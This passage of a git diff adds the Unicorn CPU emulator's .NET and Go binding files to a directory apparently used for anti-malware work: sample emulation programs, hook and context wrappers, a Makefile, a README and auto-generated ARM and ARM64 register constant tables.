Syscall EAX = 0x{0}", eax.ToString("X")); + + u.EmuStop(); + } + + private static void InterruptHookCallback(Unicorn u, Int32 intNumber, Object userData) + { + // only handle Linux syscall + if (intNumber != 0x80) + { + return; + } + + var eaxBuffer = new Byte[4]; + var eipBuffer = new Byte[4]; + + u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); + u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); + + var eax = Utils.ToInt(eaxBuffer); + var eip = Utils.ToInt(eipBuffer); + + switch (eax) + { + default: + Console.WriteLine("[!] Interrupt 0x{0} num {1}, EAX=0x{2}", eip.ToString("X"), intNumber.ToString("X"), eax.ToString("X")); + break; + case 1: // sys_exit + Console.WriteLine("[!] Interrupt 0x{0} num {1}, SYS_EXIT", eip.ToString("X"), intNumber.ToString("X")); + u.EmuStop(); + break; + case 4: // sys_write + + // ECX = buffer address + var ecxBuffer = new Byte[4]; + + // EDX = buffer size + var edxBuffer = new Byte[4]; + + u.RegRead(X86.UC_X86_REG_ECX, ecxBuffer); + u.RegRead(X86.UC_X86_REG_EDX, edxBuffer); + + var ecx = Utils.ToInt(ecxBuffer); + var edx = Utils.ToInt(edxBuffer); + + // read the buffer in + var size = Math.Min(256, edx); + var buffer = new Byte[size]; + u.MemRead(ecx, buffer); + var content = Encoding.Default.GetString(buffer); + + Console.WriteLine( + "[!] Interrupt 0x{0}: num {1}, SYS_WRITE. 
buffer = 0x{2}, size = , content = '{3}'", + eip.ToString("X"), + ecx.ToString("X"), + edx.ToString("X"), + content); + + break; + } + } + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/packages.config b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/packages.config new file mode 100644 index 0000000..d4215ee --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/packages.config @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/Makefile b/ai_anti_malware/unicorn/unicorn-master/bindings/go/Makefile new file mode 100644 index 0000000..fe898ae --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/Makefile @@ -0,0 +1,12 @@ +# Go binding for Unicorn engine. Ryan Hileman + +.PHONY: all gen_const test + +all: gen_const + cd unicorn && go build + +gen_const: + cd .. && python const_generator.py go + +test: all + cd unicorn && LD_LIBRARY_PATH=../../../ DYLD_LIBRARY_PATH=../../../ go test diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/README.md b/ai_anti_malware/unicorn/unicorn-master/bindings/go/README.md new file mode 100644 index 0000000..3433dad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/README.md @@ -0,0 +1,29 @@ +To download/update the Unicorn Go bindings, run: + + go get -u github.com/unicorn-engine/unicorn/bindings/go + +A very basic usage example follows + +_(Does not handle most errors for brevity. 
Please see sample.go for a more hygenic example):_ + + package main + + import ( + "fmt" + uc "github.com/unicorn-engine/unicorn/bindings/go/unicorn" + ) + + func main() { + mu, _ := uc.NewUnicorn(uc.ARCH_X86, uc.MODE_32) + // mov eax, 1234 + code := []byte{184, 210, 4, 0, 0} + mu.MemMap(0x1000, 0x1000) + mu.MemWrite(0x1000, code) + if err := mu.Start(0x1000, 0x1000+uint64(len(code))); err != nil { + panic(err) + } + eax, _ := mu.RegRead(uc.X86_REG_EAX) + fmt.Printf("EAX is now: %d\n", eax) + } + +An example program exercising far more Unicorn functionality and error handling can be found in sample.go. diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/sample.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/sample.go new file mode 100644 index 0000000..6c66ace --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/sample.go @@ -0,0 +1,105 @@ +package main + +import ( + "encoding/hex" + "fmt" + uc "github.com/unicorn-engine/unicorn/bindings/go/unicorn" + "strings" +) + +var asm = strings.Join([]string{ + "48c7c003000000", // mov rax, 3 + "0f05", // syscall + "48c7c700400000", // mov rdi, 0x4000 + "488907", // mov [rdi], rdx + "488b07", // mov rdx, [rdi] + "4883c201", // add rdx, 1 +}, "") + +func addHooks(mu uc.Unicorn) { + mu.HookAdd(uc.HOOK_BLOCK, func(mu uc.Unicorn, addr uint64, size uint32) { + fmt.Printf("Block: 0x%x, 0x%x\n", addr, size) + }, 1, 0) + mu.HookAdd(uc.HOOK_CODE, func(mu uc.Unicorn, addr uint64, size uint32) { + fmt.Printf("Code: 0x%x, 0x%x\n", addr, size) + }, 1, 0) + mu.HookAdd(uc.HOOK_MEM_READ|uc.HOOK_MEM_WRITE, func(mu uc.Unicorn, access int, addr uint64, size int, value int64) { + if access == uc.MEM_WRITE { + fmt.Printf("Mem write") + } else { + fmt.Printf("Mem read") + } + fmt.Printf(": @0x%x, 0x%x = 0x%x\n", addr, size, value) + }, 1, 0) + invalid := uc.HOOK_MEM_READ_INVALID | uc.HOOK_MEM_WRITE_INVALID | uc.HOOK_MEM_FETCH_INVALID + mu.HookAdd(invalid, func(mu uc.Unicorn, access int, addr uint64, size int, 
value int64) bool { + switch access { + case uc.MEM_WRITE_UNMAPPED | uc.MEM_WRITE_PROT: + fmt.Printf("invalid write") + case uc.MEM_READ_UNMAPPED | uc.MEM_READ_PROT: + fmt.Printf("invalid read") + case uc.MEM_FETCH_UNMAPPED | uc.MEM_FETCH_PROT: + fmt.Printf("invalid fetch") + default: + fmt.Printf("unknown memory error") + } + fmt.Printf(": @0x%x, 0x%x = 0x%x\n", addr, size, value) + return false + }, 1, 0) + mu.HookAdd(uc.HOOK_INSN, func(mu uc.Unicorn) { + rax, _ := mu.RegRead(uc.X86_REG_RAX) + fmt.Printf("Syscall: %d\n", rax) + }, 1, 0, uc.X86_INS_SYSCALL) +} + +func run() error { + code, err := hex.DecodeString(asm) + if err != nil { + return err + } + // set up unicorn instance and add hooks + mu, err := uc.NewUnicorn(uc.ARCH_X86, uc.MODE_64) + if err != nil { + return err + } + addHooks(mu) + // map and write code to memory + if err := mu.MemMap(0x1000, 0x1000); err != nil { + return err + } + if err := mu.MemWrite(0x1000, code); err != nil { + return err + } + // map scratch space + if err := mu.MemMap(0x4000, 0x1000); err != nil { + return err + } + // set example register + if err := mu.RegWrite(uc.X86_REG_RDX, 1); err != nil { + return err + } + rdx, err := mu.RegRead(uc.X86_REG_RDX) + if err != nil { + return err + } + fmt.Printf("RDX is: %d\n", rdx) + + // start emulation + if err := mu.Start(0x1000, 0x1000+uint64(len(code))); err != nil { + return err + } + + // read back example register + rdx, err = mu.RegRead(uc.X86_REG_RDX) + if err != nil { + return err + } + fmt.Printf("RDX is now: %d\n", rdx) + return nil +} + +func main() { + if err := run(); err != nil { + fmt.Println(err) + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm64_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm64_const.go new file mode 100644 index 0000000..fb8dc90 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm64_const.go @@ -0,0 +1,314 @@ +package unicorn +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.go] +const ( + +// ARM64 registers + + ARM64_REG_INVALID = 0 + ARM64_REG_X29 = 1 + ARM64_REG_X30 = 2 + ARM64_REG_NZCV = 3 + ARM64_REG_SP = 4 + ARM64_REG_WSP = 5 + ARM64_REG_WZR = 6 + ARM64_REG_XZR = 7 + ARM64_REG_B0 = 8 + ARM64_REG_B1 = 9 + ARM64_REG_B2 = 10 + ARM64_REG_B3 = 11 + ARM64_REG_B4 = 12 + ARM64_REG_B5 = 13 + ARM64_REG_B6 = 14 + ARM64_REG_B7 = 15 + ARM64_REG_B8 = 16 + ARM64_REG_B9 = 17 + ARM64_REG_B10 = 18 + ARM64_REG_B11 = 19 + ARM64_REG_B12 = 20 + ARM64_REG_B13 = 21 + ARM64_REG_B14 = 22 + ARM64_REG_B15 = 23 + ARM64_REG_B16 = 24 + ARM64_REG_B17 = 25 + ARM64_REG_B18 = 26 + ARM64_REG_B19 = 27 + ARM64_REG_B20 = 28 + ARM64_REG_B21 = 29 + ARM64_REG_B22 = 30 + ARM64_REG_B23 = 31 + ARM64_REG_B24 = 32 + ARM64_REG_B25 = 33 + ARM64_REG_B26 = 34 + ARM64_REG_B27 = 35 + ARM64_REG_B28 = 36 + ARM64_REG_B29 = 37 + ARM64_REG_B30 = 38 + ARM64_REG_B31 = 39 + ARM64_REG_D0 = 40 + ARM64_REG_D1 = 41 + ARM64_REG_D2 = 42 + ARM64_REG_D3 = 43 + ARM64_REG_D4 = 44 + ARM64_REG_D5 = 45 + ARM64_REG_D6 = 46 + ARM64_REG_D7 = 47 + ARM64_REG_D8 = 48 + ARM64_REG_D9 = 49 + ARM64_REG_D10 = 50 + ARM64_REG_D11 = 51 + ARM64_REG_D12 = 52 + ARM64_REG_D13 = 53 + ARM64_REG_D14 = 54 + ARM64_REG_D15 = 55 + ARM64_REG_D16 = 56 + ARM64_REG_D17 = 57 + ARM64_REG_D18 = 58 + ARM64_REG_D19 = 59 + ARM64_REG_D20 = 60 + ARM64_REG_D21 = 61 + ARM64_REG_D22 = 62 + ARM64_REG_D23 = 63 + ARM64_REG_D24 = 64 + ARM64_REG_D25 = 65 + ARM64_REG_D26 = 66 + ARM64_REG_D27 = 67 + ARM64_REG_D28 = 68 + ARM64_REG_D29 = 69 + ARM64_REG_D30 = 70 + ARM64_REG_D31 = 71 + ARM64_REG_H0 = 72 + ARM64_REG_H1 = 73 + ARM64_REG_H2 = 74 + ARM64_REG_H3 = 75 + ARM64_REG_H4 = 76 + ARM64_REG_H5 = 77 + ARM64_REG_H6 = 78 + ARM64_REG_H7 = 79 + ARM64_REG_H8 = 80 + ARM64_REG_H9 = 81 + ARM64_REG_H10 = 82 + ARM64_REG_H11 = 83 + ARM64_REG_H12 = 84 + ARM64_REG_H13 = 85 + ARM64_REG_H14 = 86 + ARM64_REG_H15 = 87 + ARM64_REG_H16 = 88 + ARM64_REG_H17 = 89 + ARM64_REG_H18 = 90 + ARM64_REG_H19 = 91 + ARM64_REG_H20 = 92 
+ ARM64_REG_H21 = 93 + ARM64_REG_H22 = 94 + ARM64_REG_H23 = 95 + ARM64_REG_H24 = 96 + ARM64_REG_H25 = 97 + ARM64_REG_H26 = 98 + ARM64_REG_H27 = 99 + ARM64_REG_H28 = 100 + ARM64_REG_H29 = 101 + ARM64_REG_H30 = 102 + ARM64_REG_H31 = 103 + ARM64_REG_Q0 = 104 + ARM64_REG_Q1 = 105 + ARM64_REG_Q2 = 106 + ARM64_REG_Q3 = 107 + ARM64_REG_Q4 = 108 + ARM64_REG_Q5 = 109 + ARM64_REG_Q6 = 110 + ARM64_REG_Q7 = 111 + ARM64_REG_Q8 = 112 + ARM64_REG_Q9 = 113 + ARM64_REG_Q10 = 114 + ARM64_REG_Q11 = 115 + ARM64_REG_Q12 = 116 + ARM64_REG_Q13 = 117 + ARM64_REG_Q14 = 118 + ARM64_REG_Q15 = 119 + ARM64_REG_Q16 = 120 + ARM64_REG_Q17 = 121 + ARM64_REG_Q18 = 122 + ARM64_REG_Q19 = 123 + ARM64_REG_Q20 = 124 + ARM64_REG_Q21 = 125 + ARM64_REG_Q22 = 126 + ARM64_REG_Q23 = 127 + ARM64_REG_Q24 = 128 + ARM64_REG_Q25 = 129 + ARM64_REG_Q26 = 130 + ARM64_REG_Q27 = 131 + ARM64_REG_Q28 = 132 + ARM64_REG_Q29 = 133 + ARM64_REG_Q30 = 134 + ARM64_REG_Q31 = 135 + ARM64_REG_S0 = 136 + ARM64_REG_S1 = 137 + ARM64_REG_S2 = 138 + ARM64_REG_S3 = 139 + ARM64_REG_S4 = 140 + ARM64_REG_S5 = 141 + ARM64_REG_S6 = 142 + ARM64_REG_S7 = 143 + ARM64_REG_S8 = 144 + ARM64_REG_S9 = 145 + ARM64_REG_S10 = 146 + ARM64_REG_S11 = 147 + ARM64_REG_S12 = 148 + ARM64_REG_S13 = 149 + ARM64_REG_S14 = 150 + ARM64_REG_S15 = 151 + ARM64_REG_S16 = 152 + ARM64_REG_S17 = 153 + ARM64_REG_S18 = 154 + ARM64_REG_S19 = 155 + ARM64_REG_S20 = 156 + ARM64_REG_S21 = 157 + ARM64_REG_S22 = 158 + ARM64_REG_S23 = 159 + ARM64_REG_S24 = 160 + ARM64_REG_S25 = 161 + ARM64_REG_S26 = 162 + ARM64_REG_S27 = 163 + ARM64_REG_S28 = 164 + ARM64_REG_S29 = 165 + ARM64_REG_S30 = 166 + ARM64_REG_S31 = 167 + ARM64_REG_W0 = 168 + ARM64_REG_W1 = 169 + ARM64_REG_W2 = 170 + ARM64_REG_W3 = 171 + ARM64_REG_W4 = 172 + ARM64_REG_W5 = 173 + ARM64_REG_W6 = 174 + ARM64_REG_W7 = 175 + ARM64_REG_W8 = 176 + ARM64_REG_W9 = 177 + ARM64_REG_W10 = 178 + ARM64_REG_W11 = 179 + ARM64_REG_W12 = 180 + ARM64_REG_W13 = 181 + ARM64_REG_W14 = 182 + ARM64_REG_W15 = 183 + ARM64_REG_W16 = 184 + 
ARM64_REG_W17 = 185 + ARM64_REG_W18 = 186 + ARM64_REG_W19 = 187 + ARM64_REG_W20 = 188 + ARM64_REG_W21 = 189 + ARM64_REG_W22 = 190 + ARM64_REG_W23 = 191 + ARM64_REG_W24 = 192 + ARM64_REG_W25 = 193 + ARM64_REG_W26 = 194 + ARM64_REG_W27 = 195 + ARM64_REG_W28 = 196 + ARM64_REG_W29 = 197 + ARM64_REG_W30 = 198 + ARM64_REG_X0 = 199 + ARM64_REG_X1 = 200 + ARM64_REG_X2 = 201 + ARM64_REG_X3 = 202 + ARM64_REG_X4 = 203 + ARM64_REG_X5 = 204 + ARM64_REG_X6 = 205 + ARM64_REG_X7 = 206 + ARM64_REG_X8 = 207 + ARM64_REG_X9 = 208 + ARM64_REG_X10 = 209 + ARM64_REG_X11 = 210 + ARM64_REG_X12 = 211 + ARM64_REG_X13 = 212 + ARM64_REG_X14 = 213 + ARM64_REG_X15 = 214 + ARM64_REG_X16 = 215 + ARM64_REG_X17 = 216 + ARM64_REG_X18 = 217 + ARM64_REG_X19 = 218 + ARM64_REG_X20 = 219 + ARM64_REG_X21 = 220 + ARM64_REG_X22 = 221 + ARM64_REG_X23 = 222 + ARM64_REG_X24 = 223 + ARM64_REG_X25 = 224 + ARM64_REG_X26 = 225 + ARM64_REG_X27 = 226 + ARM64_REG_X28 = 227 + ARM64_REG_V0 = 228 + ARM64_REG_V1 = 229 + ARM64_REG_V2 = 230 + ARM64_REG_V3 = 231 + ARM64_REG_V4 = 232 + ARM64_REG_V5 = 233 + ARM64_REG_V6 = 234 + ARM64_REG_V7 = 235 + ARM64_REG_V8 = 236 + ARM64_REG_V9 = 237 + ARM64_REG_V10 = 238 + ARM64_REG_V11 = 239 + ARM64_REG_V12 = 240 + ARM64_REG_V13 = 241 + ARM64_REG_V14 = 242 + ARM64_REG_V15 = 243 + ARM64_REG_V16 = 244 + ARM64_REG_V17 = 245 + ARM64_REG_V18 = 246 + ARM64_REG_V19 = 247 + ARM64_REG_V20 = 248 + ARM64_REG_V21 = 249 + ARM64_REG_V22 = 250 + ARM64_REG_V23 = 251 + ARM64_REG_V24 = 252 + ARM64_REG_V25 = 253 + ARM64_REG_V26 = 254 + ARM64_REG_V27 = 255 + ARM64_REG_V28 = 256 + ARM64_REG_V29 = 257 + ARM64_REG_V30 = 258 + ARM64_REG_V31 = 259 + +// pseudo registers + ARM64_REG_PC = 260 + ARM64_REG_CPACR_EL1 = 261 + +// thread registers + ARM64_REG_TPIDR_EL0 = 262 + ARM64_REG_TPIDRRO_EL0 = 263 + ARM64_REG_TPIDR_EL1 = 264 + ARM64_REG_PSTATE = 265 + +// exception link registers + ARM64_REG_ELR_EL0 = 266 + ARM64_REG_ELR_EL1 = 267 + ARM64_REG_ELR_EL2 = 268 + ARM64_REG_ELR_EL3 = 269 + +// stack pointers registers 
+ ARM64_REG_SP_EL0 = 270 + ARM64_REG_SP_EL1 = 271 + ARM64_REG_SP_EL2 = 272 + ARM64_REG_SP_EL3 = 273 + +// other CP15 registers + ARM64_REG_TTBR0_EL1 = 274 + ARM64_REG_TTBR1_EL1 = 275 + ARM64_REG_ESR_EL0 = 276 + ARM64_REG_ESR_EL1 = 277 + ARM64_REG_ESR_EL2 = 278 + ARM64_REG_ESR_EL3 = 279 + ARM64_REG_FAR_EL0 = 280 + ARM64_REG_FAR_EL1 = 281 + ARM64_REG_FAR_EL2 = 282 + ARM64_REG_FAR_EL3 = 283 + ARM64_REG_PAR_EL1 = 284 + ARM64_REG_MAIR_EL1 = 285 + ARM64_REG_VBAR_EL0 = 286 + ARM64_REG_VBAR_EL1 = 287 + ARM64_REG_VBAR_EL2 = 288 + ARM64_REG_VBAR_EL3 = 289 + ARM64_REG_ENDING = 290 + +// alias registers + ARM64_REG_IP0 = 215 + ARM64_REG_IP1 = 216 + ARM64_REG_FP = 1 + ARM64_REG_LR = 2 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm_const.go new file mode 100644 index 0000000..d4321c9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm_const.go @@ -0,0 +1,135 @@ +package unicorn +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [arm_const.go] +const ( + +// ARM registers + + ARM_REG_INVALID = 0 + ARM_REG_APSR = 1 + ARM_REG_APSR_NZCV = 2 + ARM_REG_CPSR = 3 + ARM_REG_FPEXC = 4 + ARM_REG_FPINST = 5 + ARM_REG_FPSCR = 6 + ARM_REG_FPSCR_NZCV = 7 + ARM_REG_FPSID = 8 + ARM_REG_ITSTATE = 9 + ARM_REG_LR = 10 + ARM_REG_PC = 11 + ARM_REG_SP = 12 + ARM_REG_SPSR = 13 + ARM_REG_D0 = 14 + ARM_REG_D1 = 15 + ARM_REG_D2 = 16 + ARM_REG_D3 = 17 + ARM_REG_D4 = 18 + ARM_REG_D5 = 19 + ARM_REG_D6 = 20 + ARM_REG_D7 = 21 + ARM_REG_D8 = 22 + ARM_REG_D9 = 23 + ARM_REG_D10 = 24 + ARM_REG_D11 = 25 + ARM_REG_D12 = 26 + ARM_REG_D13 = 27 + ARM_REG_D14 = 28 + ARM_REG_D15 = 29 + ARM_REG_D16 = 30 + ARM_REG_D17 = 31 + ARM_REG_D18 = 32 + ARM_REG_D19 = 33 + ARM_REG_D20 = 34 + ARM_REG_D21 = 35 + ARM_REG_D22 = 36 + ARM_REG_D23 = 37 + ARM_REG_D24 = 38 + ARM_REG_D25 = 39 + ARM_REG_D26 = 40 + ARM_REG_D27 = 41 + ARM_REG_D28 = 42 + ARM_REG_D29 = 43 + ARM_REG_D30 = 44 + ARM_REG_D31 = 45 + ARM_REG_FPINST2 = 46 + ARM_REG_MVFR0 = 47 + ARM_REG_MVFR1 = 48 + ARM_REG_MVFR2 = 49 + ARM_REG_Q0 = 50 + ARM_REG_Q1 = 51 + ARM_REG_Q2 = 52 + ARM_REG_Q3 = 53 + ARM_REG_Q4 = 54 + ARM_REG_Q5 = 55 + ARM_REG_Q6 = 56 + ARM_REG_Q7 = 57 + ARM_REG_Q8 = 58 + ARM_REG_Q9 = 59 + ARM_REG_Q10 = 60 + ARM_REG_Q11 = 61 + ARM_REG_Q12 = 62 + ARM_REG_Q13 = 63 + ARM_REG_Q14 = 64 + ARM_REG_Q15 = 65 + ARM_REG_R0 = 66 + ARM_REG_R1 = 67 + ARM_REG_R2 = 68 + ARM_REG_R3 = 69 + ARM_REG_R4 = 70 + ARM_REG_R5 = 71 + ARM_REG_R6 = 72 + ARM_REG_R7 = 73 + ARM_REG_R8 = 74 + ARM_REG_R9 = 75 + ARM_REG_R10 = 76 + ARM_REG_R11 = 77 + ARM_REG_R12 = 78 + ARM_REG_S0 = 79 + ARM_REG_S1 = 80 + ARM_REG_S2 = 81 + ARM_REG_S3 = 82 + ARM_REG_S4 = 83 + ARM_REG_S5 = 84 + ARM_REG_S6 = 85 + ARM_REG_S7 = 86 + ARM_REG_S8 = 87 + ARM_REG_S9 = 88 + ARM_REG_S10 = 89 + ARM_REG_S11 = 90 + ARM_REG_S12 = 91 + ARM_REG_S13 = 92 + ARM_REG_S14 = 93 + ARM_REG_S15 = 94 + ARM_REG_S16 = 95 + ARM_REG_S17 = 96 + ARM_REG_S18 = 97 + ARM_REG_S19 = 98 + ARM_REG_S20 = 99 + ARM_REG_S21 = 100 + 
ARM_REG_S22 = 101 + ARM_REG_S23 = 102 + ARM_REG_S24 = 103 + ARM_REG_S25 = 104 + ARM_REG_S26 = 105 + ARM_REG_S27 = 106 + ARM_REG_S28 = 107 + ARM_REG_S29 = 108 + ARM_REG_S30 = 109 + ARM_REG_S31 = 110 + ARM_REG_C1_C0_2 = 111 + ARM_REG_C13_C0_2 = 112 + ARM_REG_C13_C0_3 = 113 + ARM_REG_IPSR = 114 + ARM_REG_MSP = 115 + ARM_REG_PSP = 116 + ARM_REG_CONTROL = 117 + ARM_REG_ENDING = 118 + +// alias registers + ARM_REG_R13 = 12 + ARM_REG_R14 = 10 + ARM_REG_R15 = 11 + ARM_REG_SB = 75 + ARM_REG_SL = 76 + ARM_REG_FP = 77 + ARM_REG_IP = 78 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context.go new file mode 100644 index 0000000..3e8bcbf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context.go @@ -0,0 +1,29 @@ +package unicorn + +import ( + "runtime" + "unsafe" +) + +// #include +import "C" + +type Context **C.uc_context + +func (u *uc) ContextSave(reuse Context) (Context, error) { + ctx := reuse + if ctx == nil { + ctx = new(*C.uc_context) + } + if err := errReturn(C.uc_context_alloc(u.handle, ctx)); err != nil { + return nil, err + } + runtime.SetFinalizer(ctx, func(p Context) { C.uc_free(unsafe.Pointer(*p)) }) + if err := errReturn(C.uc_context_save(u.handle, *ctx)); err != nil { + } + return ctx, nil +} + +func (u *uc) ContextRestore(ctx Context) error { + return errReturn(C.uc_context_restore(u.handle, *ctx)) +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context_test.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context_test.go new file mode 100644 index 0000000..3231ef4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context_test.go @@ -0,0 +1,26 @@ +package unicorn + +import ( + "testing" +) + +func TestContext(t *testing.T) { + u, err := NewUnicorn(ARCH_X86, MODE_32) + if err != nil { + t.Fatal(err) + } + u.RegWrite(X86_REG_EBP, 100) + 
ctx, err := u.ContextSave(nil) + if err != nil { + t.Fatal(err) + } + u.RegWrite(X86_REG_EBP, 200) + err = u.ContextRestore(ctx) + if err != nil { + t.Fatal(err) + } + val, _ := u.RegRead(X86_REG_EBP) + if val != 100 { + t.Fatal("context restore failed") + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.c b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.c new file mode 100644 index 0000000..a2b7dc9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.c @@ -0,0 +1,42 @@ +#include +#include "_cgo_export.h" + +uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...); + + +uc_err uc_hook_add_wrap(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end) { + return uc_hook_add(handle, h2, type, callback, (void *)user, begin, end); +} + +uc_err uc_hook_add_insn(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end, int insn) { + return uc_hook_add(handle, h2, type, callback, (void *)user, begin, end, insn); +} + +void hookCode_cgo(uc_engine *handle, uint64_t addr, uint32_t size, uintptr_t user) { + hookCode(handle, addr, size, (void *)user); +} + +bool hookMemInvalid_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user) { + return hookMemInvalid(handle, type, addr, size, value, (void *)user); +} + +void hookMemAccess_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user) { + hookMemAccess(handle, type, addr, size, value, (void *)user); +} + +void hookInterrupt_cgo(uc_engine *handle, uint32_t intno, uintptr_t user) { + hookInterrupt(handle, intno, (void *)user); +} + +uint32_t hookX86In_cgo(uc_engine *handle, uint32_t port, uint32_t size, uintptr_t user) { + return hookX86In(handle, port, size, (void *)user); +} + +void 
hookX86Out_cgo(uc_engine *handle, uint32_t port, uint32_t size, uint32_t value, uintptr_t user) { + hookX86Out(handle, port, size, value, (void *)user); +} + +void hookX86Syscall_cgo(uc_engine *handle, uintptr_t user) { + hookX86Syscall(handle, (void *)user); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.go new file mode 100644 index 0000000..0d7fd68 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.go @@ -0,0 +1,153 @@ +package unicorn + +import ( + "errors" + "sync" + "unsafe" +) + +/* +#include +#include "hook.h" +*/ +import "C" + +type HookData struct { + Uc Unicorn + Callback interface{} +} + +type Hook uint64 + +type fastHookMap struct { + vals []*HookData + sync.RWMutex +} + +func (m *fastHookMap) insert(h *HookData) uintptr { + // don't change this to defer + m.Lock() + for i, v := range m.vals { + if v == nil { + m.vals[i] = h + m.Unlock() + return uintptr(i) + } + } + i := len(m.vals) + m.vals = append(m.vals, h) + m.Unlock() + return uintptr(i) +} + +func (m *fastHookMap) get(i unsafe.Pointer) *HookData { + m.RLock() + // TODO: nil check? 
+ v := m.vals[uintptr(i)] + m.RUnlock() + return v +} + +func (m *fastHookMap) remove(i uintptr) { + m.Lock() + m.vals[i] = nil + m.Unlock() +} + +var hookMap fastHookMap + +//export hookCode +func hookCode(handle unsafe.Pointer, addr uint64, size uint32, user unsafe.Pointer) { + hook := hookMap.get(user) + hook.Callback.(func(Unicorn, uint64, uint32))(hook.Uc, uint64(addr), uint32(size)) +} + +//export hookMemInvalid +func hookMemInvalid(handle unsafe.Pointer, typ C.uc_mem_type, addr uint64, size int, value int64, user unsafe.Pointer) bool { + hook := hookMap.get(user) + return hook.Callback.(func(Unicorn, int, uint64, int, int64) bool)(hook.Uc, int(typ), addr, size, value) +} + +//export hookMemAccess +func hookMemAccess(handle unsafe.Pointer, typ C.uc_mem_type, addr uint64, size int, value int64, user unsafe.Pointer) { + hook := hookMap.get(user) + hook.Callback.(func(Unicorn, int, uint64, int, int64))(hook.Uc, int(typ), addr, size, value) +} + +//export hookInterrupt +func hookInterrupt(handle unsafe.Pointer, intno uint32, user unsafe.Pointer) { + hook := hookMap.get(user) + hook.Callback.(func(Unicorn, uint32))(hook.Uc, intno) +} + +//export hookX86In +func hookX86In(handle unsafe.Pointer, port, size uint32, user unsafe.Pointer) uint32 { + hook := hookMap.get(user) + return hook.Callback.(func(Unicorn, uint32, uint32) uint32)(hook.Uc, port, size) +} + +//export hookX86Out +func hookX86Out(handle unsafe.Pointer, port, size, value uint32, user unsafe.Pointer) { + hook := hookMap.get(user) + hook.Callback.(func(Unicorn, uint32, uint32, uint32))(hook.Uc, port, size, value) +} + +//export hookX86Syscall +func hookX86Syscall(handle unsafe.Pointer, user unsafe.Pointer) { + hook := hookMap.get(user) + hook.Callback.(func(Unicorn))(hook.Uc) +} + +func (u *uc) HookAdd(htype int, cb interface{}, begin, end uint64, extra ...int) (Hook, error) { + var callback unsafe.Pointer + var insn C.int + var insnMode bool + switch htype { + case HOOK_BLOCK, HOOK_CODE: + callback = 
C.hookCode_cgo + case HOOK_MEM_READ, HOOK_MEM_WRITE, HOOK_MEM_READ | HOOK_MEM_WRITE: + callback = C.hookMemAccess_cgo + case HOOK_INTR: + callback = C.hookInterrupt_cgo + case HOOK_INSN: + insn = C.int(extra[0]) + insnMode = true + switch insn { + case X86_INS_IN: + callback = C.hookX86In_cgo + case X86_INS_OUT: + callback = C.hookX86Out_cgo + case X86_INS_SYSCALL, X86_INS_SYSENTER: + callback = C.hookX86Syscall_cgo + default: + return 0, errors.New("Unknown instruction type.") + } + default: + // special case for mask + if htype&(HOOK_MEM_READ_UNMAPPED|HOOK_MEM_WRITE_UNMAPPED|HOOK_MEM_FETCH_UNMAPPED| + HOOK_MEM_READ_PROT|HOOK_MEM_WRITE_PROT|HOOK_MEM_FETCH_PROT) != 0 { + callback = C.hookMemInvalid_cgo + } else { + return 0, errors.New("Unknown hook type.") + } + } + var h2 C.uc_hook + data := &HookData{u, cb} + uptr := hookMap.insert(data) + if insnMode { + C.uc_hook_add_insn(u.handle, &h2, C.uc_hook_type(htype), callback, C.uintptr_t(uptr), C.uint64_t(begin), C.uint64_t(end), insn) + } else { + C.uc_hook_add_wrap(u.handle, &h2, C.uc_hook_type(htype), callback, C.uintptr_t(uptr), C.uint64_t(begin), C.uint64_t(end)) + } + // TODO: could move Hook and uptr onto HookData and just return it + u.hooks[Hook(h2)] = uptr + return Hook(h2), nil +} + +func (u *uc) HookDel(hook Hook) error { + if uptr, ok := u.hooks[hook]; ok { + delete(u.hooks, hook) + hookMap.remove(uptr) + } + return errReturn(C.uc_hook_del(u.handle, 